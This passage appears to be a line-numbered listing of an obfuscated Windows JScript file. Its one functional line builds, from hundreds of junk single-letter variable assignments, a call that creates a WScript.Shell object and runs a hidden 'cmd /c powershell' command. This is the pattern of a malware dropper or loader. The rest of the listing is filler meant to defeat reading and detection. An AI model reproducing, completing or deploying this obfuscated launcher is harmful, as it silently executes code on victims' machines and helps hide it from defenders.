13 | this[tmnikx + xrlsklvcn + sgtna + rdfzrh + raidx + bljtk + plekzlegi][yoxtfwgmn + rdfzrh + xyhjmivc + rvzhcrzgk + plekzlegi + xyhjmivc + dcauhed + janlx + jadsd + xyhjmivc + sgtna + plekzlegi] ( tmnikx + xrlsklvcn + sgtna + rdfzrh + raidx + bljtk + plekzlegi + jvflxztax + xrlsklvcn + tklndn + xyhjmivc + tmypfwnj + tmypfwnj ) [rdfzrh + mlqzj + ejtjqzieo] ( sgtna + zgqvsyrho + fpors + uxaeprr + okbtgwg + sgtna + uxaeprr + bljtk + ntzbizt + xtvvvo + xyhjmivc + rdfzrh + ctcnya + tklndn + xyhjmivc + tmypfwnj + tmypfwnj + jvflxztax + xyhjmivc + lszohmwr + xyhjmivc + uxaeprr + jkokiw + yoxtfwgmn + ntzbizt + zgqvsyrho + zgqvsyrho + rvzhcrzgk + ejtjqzieo + fpors + uxaeprr + ptqwggr + saxaswq + ejtjqzieo + xxohefoq + ntzbizt + njuanv + xyhjmivc + jkokiw + tmnikx + xyhjmivc + janlx + cpaotezor + xyhjmivc + sswbmvaal + mlqzj + xyhjmivc + ctcnya + plekzlegi + uxaeprr + jkokiw + dcauhed + mlqzj + plekzlegi + jbcitvew + raidx + tmypfwnj + xyhjmivc + uxaeprr + lyvnazqgy + plekzlegi + xyhjmivc + zgqvsyrho + bljtk + lyvnazqgy + xlwzjkdp + raidx + ejtjqzieo + xxohefoq + ntzbizt + raidx + sgtna + xyhjmivc + jvflxztax + bljtk + fpors + qbvmxjbj + uxaeprr + tklndn + plekzlegi + plekzlegi + bljtk + rraqayd + okbtgwg + okbtgwg + ukhan + jsrsgkds + vpjve + jvflxztax + ukhan + kpuwrtfh + vpjve + jvflxztax + ukhan + jvflxztax + ujdzddbiu + mikkhpcp + ledha + okbtgwg + raidx + ejtjqzieo + xxohefoq + ntzbizt + raidx + sgtna + xyhjmivc + jvflxztax + bljtk + tklndn + bljtk + ptqwggr + fnpzqgy + fnpzqgy + ctcnya + plekzlegi + rvzhcrzgk + rdfzrh + plekzlegi + uxaeprr + lyvnazqgy + plekzlegi + xyhjmivc + zgqvsyrho + bljtk + lyvnazqgy + xlwzjkdp + raidx + ejtjqzieo + xxohefoq + ntzbizt + raidx + sgtna + xyhjmivc + jvflxztax + bljtk + fpors + qbvmxjbj + fnpzqgy + fnpzqgy + sgtna + zgqvsyrho + fpors + uxaeprr + okbtgwg + sgtna + uxaeprr + ejtjqzieo + xyhjmivc + plekzlegi + uxaeprr + mlqzj + ctcnya + xyhjmivc + uxaeprr + xlwzjkdp + xlwzjkdp + ukhan + jsrsgkds + vpjve + jvflxztax + ukhan + kpuwrtfh + vpjve + jvflxztax + ukhan + jvflxztax + ujdzddbiu + mikkhpcp + ledha + pyvojpdos + izeryn + izeryn + izeryn + izeryn + xlwzjkdp + fpors + rvzhcrzgk + xxohefoq + xtvvvo + xtvvvo + xtvvvo + rdfzrh + ntzbizt + ntzbizt + plekzlegi + xlwzjkdp + fnpzqgy + fnpzqgy + sgtna + zgqvsyrho + fpors + uxaeprr + okbtgwg + sgtna + uxaeprr + rdfzrh + xyhjmivc + vhmirryi + ctcnya + xxohefoq + rdfzrh + vpjve + ujdzddbiu + uxaeprr + okbtgwg + ctcnya + uxaeprr + xlwzjkdp + xlwzjkdp + ukhan + jsrsgkds + vpjve + jvflxztax + ukhan + kpuwrtfh + vpjve + jvflxztax + ukhan + jvflxztax + ujdzddbiu + mikkhpcp + ledha + pyvojpdos + izeryn + izeryn + izeryn + izeryn + xlwzjkdp + fpors + rvzhcrzgk + xxohefoq + xtvvvo + xtvvvo + xtvvvo + rdfzrh + ntzbizt + ntzbizt + plekzlegi + xlwzjkdp + izeryn + ledha + izeryn + kpuwrtfh + ukhan + ledha + skklrx + skklrx + ukhan + ujdzddbiu + kpuwrtfh + skklrx + ukhan + ledha + jvflxztax + fpors + tmypfwnj + tmypfwnj, 0, false ); |
|
14 | } | |
15 | tmnikx = "k"; | |
16 | tmnikx = "V"; | |
17 | tmnikx = "p"; | |
18 | tmnikx = "s"; | |
19 | tmnikx = "A"; | |
20 | tmnikx = "a"; | |
21 | tmnikx = "R"; | |
22 | tmnikx = "g"; | |
23 | tmnikx = "X"; | |
24 | tmnikx = "l"; | |
25 | tmnikx = "F"; | |
26 | tmnikx = "K"; | |
27 | tmnikx = "W"; | |
28 | tmnikx = "r"; | |
29 | tmnikx = "W"; | |
30 | sgtna = "V"; | |
31 | sgtna = "r"; | |
32 | sgtna = "I"; | |
33 | sgtna = "O"; | |
34 | sgtna = "Q"; | |
35 | sgtna = "t"; | |
36 | sgtna = "c"; | |
37 | sgtna = "e"; | |
38 | sgtna = "d"; | |
39 | sgtna = "v"; | |
40 | sgtna = "x"; | |
41 | sgtna = "h"; | |
42 | sgtna = "F"; | |
43 | sgtna = "n"; | |
44 | sgtna = "Z"; | |
45 | sgtna = "H"; | |
46 | sgtna = "U"; | |
47 | sgtna = "v"; | |
48 | sgtna = "t"; | |
49 | sgtna = "c"; | |
50 | sgtna = "N"; | |
51 | sgtna = "A"; | |
52 | sgtna = "x"; | |
53 | sgtna = "r"; | |
54 | sgtna = "z"; | |
55 | sgtna = "l"; | |
56 | sgtna = "z"; | |
57 | sgtna = "s"; | |
58 | sgtna = "Z"; | |
59 | sgtna = "t"; | |
60 | sgtna = "h"; | |
61 | sgtna = "v"; | |
62 | sgtna = "Z"; | |
63 | sgtna = "P"; | |
64 | sgtna = "f"; | |
65 | sgtna = "q"; | |
66 | sgtna = "t"; | |
67 | sgtna = "a"; | |
68 | sgtna = "U"; | |
69 | sgtna = "Q"; | |
70 | sgtna = "g"; | |
71 | sgtna = "C"; | |
72 | sgtna = "o"; | |
73 | sgtna = "c"; | |
74 | xnyunlkwa = "Y"; | |
75 | xnyunlkwa = "Y"; | |
76 | xnyunlkwa = "m"; | |
77 | xnyunlkwa = "U"; | |
78 | xxohefoq = "Y"; | |
79 | xxohefoq = "T"; | |
80 | xxohefoq = "l"; | |
81 | xxohefoq = "D"; | |
82 | xxohefoq = "E"; | |
83 | xxohefoq = "Y"; | |
84 | xxohefoq = "u"; | |
85 | xxohefoq = "N"; | |
86 | xxohefoq = "T"; | |
87 | xxohefoq = "R"; | |
88 | xxohefoq = "u"; | |
89 | xxohefoq = "k"; | |
90 | xxohefoq = "y"; | |
91 | xxohefoq = "j"; | |
92 | xxohefoq = "T"; | |
93 | xxohefoq = "L"; | |
94 | xxohefoq = "U"; | |
95 | xxohefoq = "r"; | |
96 | xxohefoq = "x"; | |
97 | xxohefoq = "d"; | |
98 | xxohefoq = "v"; | |
99 | janlx = "b"; | |
100 | saxaswq = "E"; | |
101 | saxaswq = "a"; | |
102 | saxaswq = "w"; | |
103 | saxaswq = "r"; | |
104 | saxaswq = "Q"; | |
105 | saxaswq = "V"; | |
106 | saxaswq = "B"; | |
107 | saxaswq = "R"; | |
108 | saxaswq = "W"; | |
109 | saxaswq = "r"; | |
110 | saxaswq = "g"; | |
111 | saxaswq = "T"; | |
112 | saxaswq = "N"; | |
113 | saxaswq = "U"; | |
114 | saxaswq = "A"; | |
115 | saxaswq = "N"; | |
116 | saxaswq = "y"; | |
117 | saxaswq = "e"; | |
118 | saxaswq = "K"; | |
119 | saxaswq = "I"; | |
120 | ntzbizt = "o"; | |
121 | ntzbizt = "i"; | |
122 | ntzbizt = "i"; | |
123 | ntzbizt = "l"; | |
124 | ntzbizt = "N"; | |
125 | ntzbizt = "k"; | |
126 | ntzbizt = "P"; | |
127 | ntzbizt = "w"; | |
128 | ntzbizt = "O"; | |
129 | ntzbizt = "J"; | |
130 | ntzbizt = "q"; | |
131 | ntzbizt = "s"; | |
132 | ntzbizt = "C"; | |
133 | ntzbizt = "L"; | |
134 | ntzbizt = "E"; | |
135 | ntzbizt = "o"; | |
136 | okbtgwg = "I"; | |
137 | okbtgwg = "S"; | |
138 | okbtgwg = "N"; | |
139 | okbtgwg = "z"; | |
140 | okbtgwg = "M"; | |
141 | okbtgwg = "g"; | |
142 | okbtgwg = "m"; | |
143 | okbtgwg = "N"; | |
144 | okbtgwg = "A"; | |
145 | okbtgwg = "w"; | |
146 | okbtgwg = "q"; | |
147 | okbtgwg = "H"; | |
148 | okbtgwg = "T"; | |
149 | okbtgwg = "D"; | |
150 | okbtgwg = "s"; | |
151 | okbtgwg = "n"; | |
152 | okbtgwg = "a"; | |
153 | okbtgwg = "P"; | |
154 | okbtgwg = "F"; | |
155 | okbtgwg = "x"; | |
156 | okbtgwg = "U"; | |
157 | okbtgwg = "i"; | |
158 | okbtgwg = "C"; | |
159 | okbtgwg = "l"; | |
160 | okbtgwg = "N"; | |
161 | okbtgwg = "o"; | |
162 | okbtgwg = "U"; | |
163 | okbtgwg = "A"; | |
164 | okbtgwg = "A"; | |
165 | okbtgwg = "e"; | |
166 | okbtgwg = "y"; | |
167 | okbtgwg = "j"; | |
168 | okbtgwg = "N"; | |
169 | okbtgwg = "W"; | |
170 | okbtgwg = "h"; | |
171 | okbtgwg = "/"; | |
172 | jvflxztax = "Z"; | |
173 | jvflxztax = "U"; | |
174 | jvflxztax = "a"; | |
175 | jvflxztax = "u"; | |
176 | jvflxztax = "x"; | |
177 | jvflxztax = "t"; | |
178 | jvflxztax = "O"; | |
179 | jvflxztax = "S"; | |
180 | jvflxztax = "x"; | |
181 | jvflxztax = "x"; | |
182 | jvflxztax = "N"; | |
183 | jvflxztax = "j"; | |
184 | jvflxztax = "i"; | |
185 | jvflxztax = "m"; | |
186 | jvflxztax = "y"; | |
187 | jvflxztax = "r"; | |
188 | jvflxztax = "."; | |
189 | uxaeprr = "I"; | |
190 | uxaeprr = "K"; | |
191 | uxaeprr = "e"; | |
192 | uxaeprr = "Q"; | |
193 | uxaeprr = "x"; | |
194 | uxaeprr = "p"; | |
195 | uxaeprr = "T"; | |
196 | uxaeprr = "x"; | |
197 | uxaeprr = "H"; | |
198 | uxaeprr = "h"; | |
199 | uxaeprr = "K"; | |
200 | uxaeprr = "u"; | |
201 | uxaeprr = "Z"; | |
202 | uxaeprr = "l"; | |
203 | uxaeprr = "H"; | |
204 | uxaeprr = "G"; | |
205 | uxaeprr = "L"; | |
206 | uxaeprr = "Q"; | |
207 | uxaeprr = "T"; | |
208 | uxaeprr = "L"; | |
209 | uxaeprr = "g"; | |
210 | uxaeprr = "M"; | |
211 | uxaeprr = "Z"; | |
212 | uxaeprr = "a"; | |
213 | uxaeprr = "a"; | |
214 | uxaeprr = "I"; | |
215 | uxaeprr = "E"; | |
216 | uxaeprr = "W"; | |
217 | uxaeprr = " "; | |
218 | rvzhcrzgk = "i"; | |
219 | rvzhcrzgk = "i"; | |
220 | rvzhcrzgk = "n"; | |
221 | rvzhcrzgk = "W"; | |
222 | rvzhcrzgk = "E"; | |
223 | rvzhcrzgk = "U"; | |
224 | rvzhcrzgk = "a"; | |
225 | dcauhed = "C"; | |
226 | dcauhed = "d"; | |
227 | dcauhed = "d"; | |
228 | dcauhed = "G"; | |
229 | dcauhed = "M"; | |
230 | dcauhed = "W"; | |
231 | dcauhed = "W"; | |
232 | dcauhed = "H"; | |
233 | dcauhed = "Q"; | |
234 | dcauhed = "z"; | |
235 | dcauhed = "O"; | |
236 | pduehuser = "D"; | |
237 | pduehuser = "c"; | |
238 | pduehuser = "X"; | |
239 | pduehuser = "X"; | |
240 | pduehuser = "X"; | |
241 | pduehuser = "i"; | |
242 | pduehuser = "j"; | |
243 | pduehuser = "q"; | |
244 | pduehuser = "q"; | |
245 | pduehuser = "j"; | |
246 | pduehuser = "H"; | |
247 | pduehuser = "T"; | |
248 | pduehuser = "j"; | |
249 | pduehuser = "g"; | |
250 | pduehuser = "k"; | |
251 | pduehuser = "s"; | |
252 | pduehuser = "I"; | |
253 | pduehuser = "P"; | |
254 | pduehuser = "y"; | |
255 | pduehuser = "I"; | |
256 | pduehuser = "S"; | |
257 | pduehuser = "t"; | |
258 | pduehuser = "H"; | |
259 | pduehuser = "d"; | |
260 | pduehuser = "M"; | |
261 | pduehuser = "V"; | |
262 | pduehuser = "y"; | |
263 | pduehuser = "g"; | |
264 | pduehuser = "K"; | |
265 | pduehuser = "Y"; | |
266 | pduehuser = "F"; | |
267 | pduehuser = "T"; | |
268 | pduehuser = "b"; | |
269 | pduehuser = "r"; | |
270 | pduehuser = "c"; | |
271 | pduehuser = "G"; | |
272 | pduehuser = "W"; | |
273 | pduehuser = "E"; | |
274 | pduehuser = "V"; | |
275 | pduehuser = "V"; | |
276 | pduehuser = "Z"; | |
277 | pduehuser = "j"; | |
278 | pduehuser = "r"; | |
279 | pduehuser = "K"; | |
280 | lyvnazqgy = "x"; | |
281 | lyvnazqgy = "C"; | |
282 | lyvnazqgy = "F"; | |
283 | lyvnazqgy = "R"; | |
284 | lyvnazqgy = "s"; | |
285 | lyvnazqgy = "v"; | |
286 | lyvnazqgy = "E"; | |
287 | lyvnazqgy = "u"; | |
288 | lyvnazqgy = "N"; | |
289 | lyvnazqgy = "R"; | |
290 | lyvnazqgy = "a"; | |
291 | lyvnazqgy = "W"; | |
292 | lyvnazqgy = "K"; | |
293 | lyvnazqgy = "c"; | |
294 | lyvnazqgy = "F"; | |
295 | lyvnazqgy = "b"; | |
296 | lyvnazqgy = "y"; | |
297 | lyvnazqgy = "u"; | |
298 | lyvnazqgy = "F"; | |
299 | lyvnazqgy = "b"; | |
300 | lyvnazqgy = "P"; | |
301 | lyvnazqgy = "K"; | |
302 | lyvnazqgy = "S"; | |
303 | lyvnazqgy = "R"; | |
304 | lyvnazqgy = "r"; | |
305 | lyvnazqgy = "j"; | |
306 | lyvnazqgy = "N"; | |
307 | lyvnazqgy = "O"; | |
308 | lyvnazqgy = "k"; | |
309 | lyvnazqgy = "Q"; | |
310 | lyvnazqgy = "P"; | |
311 | lyvnazqgy = "%"; | |
312 | xlwzjkdp = "U"; | |
313 | xlwzjkdp = "i"; | |
314 | xlwzjkdp = "Q"; | |
315 | xlwzjkdp = "m"; | |
316 | xlwzjkdp = "e"; | |
317 | xlwzjkdp = "k"; | |
318 | xlwzjkdp = "x"; | |
319 | xlwzjkdp = "W"; | |
320 | xlwzjkdp = "L"; | |
321 | xlwzjkdp = "o"; | |
322 | xlwzjkdp = "X"; | |
323 | xlwzjkdp = "t"; | |
324 | xlwzjkdp = "C"; | |
325 | xlwzjkdp = "o"; | |
326 | xlwzjkdp = "p"; | |
327 | xlwzjkdp = "\\"; | |
328 | tklndn = "p"; | |
329 | tklndn = "h"; | |
330 | tklndn = "z"; | |
331 | tklndn = "Q"; | |
332 | tklndn = "I"; | |
333 | tklndn = "L"; | |
334 | tklndn = "R"; | |
335 | tklndn = "g"; | |
336 | tklndn = "E"; | |
337 | tklndn = "X"; | |
338 | tklndn = "F"; | |
339 | tklndn = "U"; | |
340 | tklndn = "u"; | |
341 | tklndn = "Q"; | |
342 | tklndn = "e"; | |
343 | tklndn = "j"; | |
344 | tklndn = "r"; | |
345 | tklndn = "A"; | |
346 | tklndn = "N"; | |
347 | tklndn = "W"; | |
348 | tklndn = "z"; | |
349 | tklndn = "F"; | |
350 | tklndn = "M"; | |
351 | tklndn = "Q"; | |
352 | tklndn = "r"; | |
353 | tklndn = "Q"; | |
354 | tklndn = "c"; | |
355 | tklndn = "a"; | |
356 | tklndn = "P"; | |
357 | tklndn = "W"; | |
358 | tklndn = "S"; | |
359 | tklndn = "n"; | |
360 | tklndn = "h"; | |
361 | skklrx = "M"; | |
362 | skklrx = "c"; | |
363 | skklrx = "D"; | |
364 | skklrx = "b"; | |
365 | skklrx = "q"; | |
366 | skklrx = "R"; | |
367 | skklrx = "u"; | |
368 | skklrx = "q"; | |
369 | skklrx = "q"; | |
370 | skklrx = "x"; | |
371 | skklrx = "U"; | |
372 | skklrx = "J"; | |
373 | skklrx = "g"; | |
374 | skklrx = "b"; | |
375 | skklrx = "F"; | |
376 | skklrx = "M"; | |
377 | skklrx = "w"; | |
378 | skklrx = "L"; | |
379 | skklrx = "a"; | |
380 | skklrx = "t"; | |
381 | skklrx = "r"; | |
382 | skklrx = "M"; | |
383 | skklrx = "x"; | |
384 | skklrx = "a"; | |
385 | skklrx = "t"; | |
386 | skklrx = "s"; | |
387 | skklrx = "K"; | |
388 | skklrx = "o"; | |
389 | skklrx = "g"; | |
390 | skklrx = "R"; | |
391 | skklrx = "L"; | |
392 | skklrx = "Z"; | |
393 | skklrx = "M"; | |
394 | skklrx = "P"; | |
395 | skklrx = "D"; | |
396 | skklrx = "6"; | |
397 | sxcrixjh = "P"; | |
398 | sxcrixjh = "O"; | |
399 | sxcrixjh = "q"; | |
400 | sxcrixjh = "s"; | |
401 | sxcrixjh = "E"; | |
402 | sxcrixjh = "F"; | |
403 | sxcrixjh = "w"; | |
404 | sxcrixjh = "W"; | |
405 | sxcrixjh = "Z"; | |
406 | sxcrixjh = "k"; | |
407 | sxcrixjh = "Z"; | |
408 | sxcrixjh = "K"; | |
409 | sxcrixjh = "p"; | |
410 | sxcrixjh = "J"; | |
411 | sxcrixjh = "q"; | |
412 | sxcrixjh = "N"; | |
413 | sxcrixjh = "p"; | |
414 | sxcrixjh = "F"; | |
415 | sxcrixjh = "v"; | |
416 | sxcrixjh = "b"; | |
417 | sxcrixjh = "N"; | |
418 | sxcrixjh = "S"; | |
419 | sxcrixjh = "v"; | |
420 | sxcrixjh = "A"; | |
421 | sxcrixjh = "g"; | |
422 | sxcrixjh = "K"; | |
423 | sxcrixjh = "O"; | |
424 | sxcrixjh = "W"; | |
425 | sxcrixjh = "i"; | |
426 | sxcrixjh = "P"; | |
427 | sxcrixjh = "Z"; | |
428 | sxcrixjh = "Y"; | |
429 | sxcrixjh = "s"; | |
430 | sxcrixjh = "P"; | |
431 | ctcnya = "j"; | |
432 | ctcnya = "m"; | |
433 | ctcnya = "D"; | |
434 | ctcnya = "J"; | |
435 | ctcnya = "I"; | |
436 | ctcnya = "o"; | |
437 | ctcnya = "W"; | |
438 | ctcnya = "x"; | |
439 | ctcnya = "x"; | |
440 | ctcnya = "p"; | |
441 | ctcnya = "Z"; | |
442 | ctcnya = "x"; | |
443 | ctcnya = "X"; | |
444 | ctcnya = "a"; | |
445 | ctcnya = "M"; | |
446 | ctcnya = "J"; | |
447 | ctcnya = "B"; | |
448 | ctcnya = "d"; | |
449 | ctcnya = "h"; | |
450 | ctcnya = "q"; | |
451 | ctcnya = "J"; | |
452 | ctcnya = "U"; | |
453 | ctcnya = "A"; | |
454 | ctcnya = "S"; | |
455 | ctcnya = "A"; | |
456 | ctcnya = "j"; | |
457 | ctcnya = "t"; | |
458 | ctcnya = "v"; | |
459 | ctcnya = "I"; | |
460 | ctcnya = "A"; | |
461 | ctcnya = "T"; | |
462 | ctcnya = "B"; | |
463 | ctcnya = "b"; | |
464 | ctcnya = "W"; | |
465 | ctcnya = "e"; | |
466 | ctcnya = "B"; | |
467 | ctcnya = "i"; | |
468 | ctcnya = "n"; | |
469 | ctcnya = "Q"; | |
470 | ctcnya = "z"; | |
471 | ctcnya = "e"; | |
472 | ctcnya = "y"; | |
473 | ctcnya = "t"; | |
474 | ctcnya = "L"; | |
475 | ctcnya = "s"; | |
476 | kpuwrtfh = "r"; | |
477 | kpuwrtfh = "T"; | |
478 | kpuwrtfh = "m"; | |
479 | kpuwrtfh = "p"; | |
480 | kpuwrtfh = "v"; | |
481 | kpuwrtfh = "q"; | |
482 | kpuwrtfh = "f"; | |
483 | kpuwrtfh = "4"; | |
484 | ptqwggr = "S"; | |
485 | ptqwggr = "J"; | |
486 | ptqwggr = "n"; | |
487 | ptqwggr = "b"; | |
488 | ptqwggr = "O"; | |
489 | ptqwggr = "e"; | |
490 | ptqwggr = "S"; | |
491 | ptqwggr = "o"; | |
492 | ptqwggr = "W"; | |
493 | ptqwggr = "A"; | |
494 | ptqwggr = "b"; | |
495 | ptqwggr = "j"; | |
496 | ptqwggr = "q"; | |
497 | ptqwggr = "n"; | |
498 | ptqwggr = "I"; | |
499 | ptqwggr = "A"; | |
500 | ptqwggr = "B"; | |
501 | ptqwggr = "F"; | |
502 | ptqwggr = "l"; | |
503 | ptqwggr = "t"; | |
504 | ptqwggr = "i"; | |
505 | ptqwggr = "Z"; | |
506 | ptqwggr = "X"; | |
507 | ptqwggr = "\""; | |
508 | jsrsgkds = "u"; | |
509 | jsrsgkds = "w"; | |
510 | jsrsgkds = "q"; | |
511 | jsrsgkds = "e"; | |
512 | jsrsgkds = "n"; | |
513 | jsrsgkds = "C"; | |
514 | jsrsgkds = "l"; | |
515 | jsrsgkds = "J"; | |
516 | jsrsgkds = "x"; | |
517 | jsrsgkds = "K"; | |
518 | jsrsgkds = "r"; | |
519 | jsrsgkds = "Z"; | |
520 | jsrsgkds = "V"; | |
521 | jsrsgkds = "j"; | |
522 | jsrsgkds = "c"; | |
523 | jsrsgkds = "B"; | |
524 | jsrsgkds = "h"; | |
525 | jsrsgkds = "W"; | |
526 | jsrsgkds = "9"; | |
527 | xrlsklvcn = "n"; | |
528 | xrlsklvcn = "t"; | |
529 | xrlsklvcn = "x"; | |
530 | xrlsklvcn = "n"; | |
531 | xrlsklvcn = "s"; | |
532 | xrlsklvcn = "U"; | |
533 | xrlsklvcn = "n"; | |
534 | xrlsklvcn = "u"; | |
535 | xrlsklvcn = "S"; | |
536 | jadsd = "k"; | |
537 | jadsd = "I"; | |
538 | jadsd = "z"; | |
539 | jadsd = "A"; | |
540 | jadsd = "O"; | |
541 | jadsd = "w"; | |
542 | jadsd = "j"; | |
543 | jadsd = "t"; | |
544 | jadsd = "W"; | |
545 | jadsd = "H"; | |
546 | jadsd = "b"; | |
547 | jadsd = "M"; | |
548 | jadsd = "c"; | |
549 | jadsd = "C"; | |
550 | jadsd = "V"; | |
551 | jadsd = "S"; | |
552 | jadsd = "e"; | |
553 | jadsd = "Q"; | |
554 | jadsd = "g"; | |
555 | jadsd = "Y"; | |
556 | jadsd = "P"; | |
557 | jadsd = "G"; | |
558 | jadsd = "r"; | |
559 | jadsd = "F"; | |
560 | jadsd = "t"; | |
561 | jadsd = "O"; | |
562 | jadsd = "d"; | |
563 | jadsd = "Y"; | |
564 | jadsd = "q"; | |
565 | jadsd = "F"; | |
566 | jadsd = "h"; | |
567 | jadsd = "f"; | |
568 | jadsd = "v"; | |
569 | jadsd = "I"; | |
570 | jadsd = "V"; | |
571 | jadsd = "K"; | |
572 | jadsd = "q"; | |
573 | jadsd = "P"; | |
574 | jadsd = "R"; | |
575 | jadsd = "O"; | |
576 | jadsd = "J"; | |
577 | jadsd = "c"; | |
578 | jadsd = "U"; | |
579 | jadsd = "d"; | |
580 | jadsd = "j"; | |
581 | jbcitvew = "m"; | |
582 | jbcitvew = "U"; | |
583 | jbcitvew = "D"; | |
584 | jbcitvew = "G"; | |
585 | jbcitvew = "H"; | |
586 | jbcitvew = "a"; | |
587 | jbcitvew = "n"; | |
588 | jbcitvew = "u"; | |
589 | jbcitvew = "s"; | |
590 | jbcitvew = "o"; | |
591 | jbcitvew = "i"; | |
592 | jbcitvew = "u"; | |
593 | jbcitvew = "n"; | |
594 | jbcitvew = "l"; | |
595 | jbcitvew = "g"; | |
596 | jbcitvew = "D"; | |
597 | jbcitvew = "C"; | |
598 | jbcitvew = "f"; | |
599 | jbcitvew = "Q"; | |
600 | jbcitvew = "b"; | |
601 | jbcitvew = "j"; | |
602 | jbcitvew = "e"; | |
603 | jbcitvew = "h"; | |
604 | jbcitvew = "A"; | |
605 | jbcitvew = "G"; | |
606 | jbcitvew = "A"; | |
607 | jbcitvew = "F"; | |
608 | jliaiyt = "k"; | |
609 | jliaiyt = "t"; | |
610 | jliaiyt = "d"; | |
611 | jliaiyt = "H"; | |
612 | jliaiyt = "u"; | |
613 | jliaiyt = "b"; | |
614 | jliaiyt = "S"; | |
615 | jliaiyt = "i"; | |
616 | jliaiyt = "D"; | |
617 | jliaiyt = "A"; | |
618 | jliaiyt = "B"; | |
619 | jliaiyt = "A"; | |
620 | jliaiyt = "j"; | |
621 | jliaiyt = "C"; | |
622 | jliaiyt = "x"; | |
623 | jliaiyt = "X"; | |
624 | jliaiyt = "L"; | |
625 | rdfzrh = "Y"; | |
626 | rdfzrh = "e"; | |
627 | rdfzrh = "X"; | |
628 | rdfzrh = "n"; | |
629 | rdfzrh = "p"; | |
630 | rdfzrh = "C"; | |
631 | rdfzrh = "M"; | |
632 | rdfzrh = "N"; | |
633 | rdfzrh = "z"; | |
634 | rdfzrh = "g"; | |
635 | rdfzrh = "L"; | |
636 | rdfzrh = "u"; | |
637 | rdfzrh = "y"; | |
638 | rdfzrh = "x"; | |
639 | rdfzrh = "P"; | |
640 | rdfzrh = "C"; | |
641 | rdfzrh = "v"; | |
642 | rdfzrh = "W"; | |
643 | rdfzrh = "a"; | |
644 | rdfzrh = "r"; | |
645 | tmypfwnj = "P"; | |
646 | tmypfwnj = "q"; | |
647 | tmypfwnj = "z"; | |
648 | tmypfwnj = "S"; | |
649 | tmypfwnj = "g"; | |
650 | tmypfwnj = "y"; | |
651 | tmypfwnj = "e"; | |
652 | tmypfwnj = "G"; | |
653 | tmypfwnj = "T"; | |
654 | tmypfwnj = "M"; | |
655 | tmypfwnj = "g"; | |
656 | tmypfwnj = "R"; | |
657 | tmypfwnj = "v"; | |
658 | tmypfwnj = "l"; | |
659 | tmypfwnj = "o"; | |
660 | tmypfwnj = "a"; | |
661 | tmypfwnj = "Z"; | |
662 | tmypfwnj = "h"; | |
663 | tmypfwnj = "W"; | |
664 | tmypfwnj = "G"; | |
665 | tmypfwnj = "b"; | |
666 | tmypfwnj = "O"; | |
667 | tmypfwnj = "O"; | |
668 | tmypfwnj = "v"; | |
669 | tmypfwnj = "r"; | |
670 | tmypfwnj = "K"; | |
671 | tmypfwnj = "L"; | |
672 | tmypfwnj = "X"; | |
673 | tmypfwnj = "r"; | |
674 | tmypfwnj = "p"; | |
675 | tmypfwnj = "K"; | |
676 | tmypfwnj = "b"; | |
677 | tmypfwnj = "W"; | |
678 | tmypfwnj = "p"; | |
679 | tmypfwnj = "g"; | |
680 | tmypfwnj = "l"; | |
681 | sswbmvaal = "B"; | |
682 | sswbmvaal = "d"; | |
683 | sswbmvaal = "L"; | |
684 | sswbmvaal = "g"; | |
685 | sswbmvaal = "U"; | |
686 | sswbmvaal = "a"; | |
687 | sswbmvaal = "t"; | |
688 | sswbmvaal = "q"; | |
689 | sswbmvaal = "I"; | |
690 | sswbmvaal = "z"; | |
691 | sswbmvaal = "Z"; | |
692 | sswbmvaal = "d"; | |
693 | sswbmvaal = "t"; | |
694 | sswbmvaal = "R"; | |
695 | sswbmvaal = "k"; | |
696 | sswbmvaal = "L"; | |
697 | sswbmvaal = "a"; | |
698 | sswbmvaal = "M"; | |
699 | sswbmvaal = "V"; | |
700 | sswbmvaal = "s"; | |
701 | sswbmvaal = "w"; | |
702 | sswbmvaal = "W"; | |
703 | sswbmvaal = "w"; | |
704 | sswbmvaal = "q"; | |
705 | sswbmvaal = "I"; | |
706 | sswbmvaal = "l"; | |
707 | sswbmvaal = "Q"; | |
708 | sswbmvaal = "q"; | |
709 | sswbmvaal = "Q"; | |
710 | sswbmvaal = "V"; | |
711 | sswbmvaal = "C"; | |
712 | sswbmvaal = "X"; | |
713 | sswbmvaal = "C"; | |
714 | sswbmvaal = "q"; | |
715 | mlqzj = "N"; | |
716 | mlqzj = "B"; | |
717 | mlqzj = "B"; | |
718 | mlqzj = "u"; | |
719 | mlqzj = "A"; | |
720 | mlqzj = "l"; | |
721 | mlqzj = "f"; | |
722 | mlqzj = "D"; | |
723 | mlqzj = "c"; | |
724 | mlqzj = "K"; | |
725 | mlqzj = "Q"; | |
726 | mlqzj = "Q"; | |
727 | mlqzj = "H"; | |
728 | mlqzj = "M"; | |
729 | mlqzj = "K"; | |
730 | mlqzj = "D"; | |
731 | mlqzj = "C"; | |
732 | mlqzj = "i"; | |
733 | mlqzj = "p"; | |
734 | mlqzj = "z"; | |
735 | mlqzj = "g"; | |
736 | mlqzj = "J"; | |
737 | mlqzj = "R"; | |
738 | mlqzj = "H"; | |
739 | mlqzj = "O"; | |
740 | mlqzj = "v"; | |
741 | mlqzj = "f"; | |
742 | mlqzj = "h"; | |
743 | mlqzj = "o"; | |
744 | mlqzj = "h"; | |
745 | mlqzj = "F"; | |
746 | mlqzj = "a"; | |
747 | mlqzj = "Q"; | |
748 | mlqzj = "p"; | |
749 | mlqzj = "r"; | |
750 | mlqzj = "C"; | |
751 | mlqzj = "u"; | |
752 | lszohmwr = "C"; | |
753 | lszohmwr = "v"; | |
754 | lszohmwr = "h"; | |
755 | lszohmwr = "h"; | |
756 | lszohmwr = "i"; | |
757 | lszohmwr = "e"; | |
758 | lszohmwr = "F"; | |
759 | lszohmwr = "c"; | |
760 | lszohmwr = "G"; | |
761 | lszohmwr = "L"; | |
762 | lszohmwr = "o"; | |
763 | lszohmwr = "B"; | |
764 | lszohmwr = "j"; | |
765 | lszohmwr = "u"; | |
766 | lszohmwr = "X"; | |
767 | lszohmwr = "j"; | |
768 | lszohmwr = "K"; | |
769 | lszohmwr = "v"; | |
770 | lszohmwr = "z"; | |
771 | lszohmwr = "Q"; | |
772 | lszohmwr = "u"; | |
773 | lszohmwr = "a"; | |
774 | lszohmwr = "E"; | |
775 | lszohmwr = "r"; | |
776 | lszohmwr = "P"; | |
777 | lszohmwr = "F"; | |
778 | lszohmwr = "T"; | |
779 | lszohmwr = "J"; | |
780 | lszohmwr = "N"; | |
781 | lszohmwr = "Y"; | |
782 | lszohmwr = "a"; | |
783 | lszohmwr = "H"; | |
784 | lszohmwr = "a"; | |
785 | lszohmwr = "Q"; | |
786 | lszohmwr = "v"; | |
787 | lszohmwr = "K"; | |
788 | lszohmwr = "N"; | |
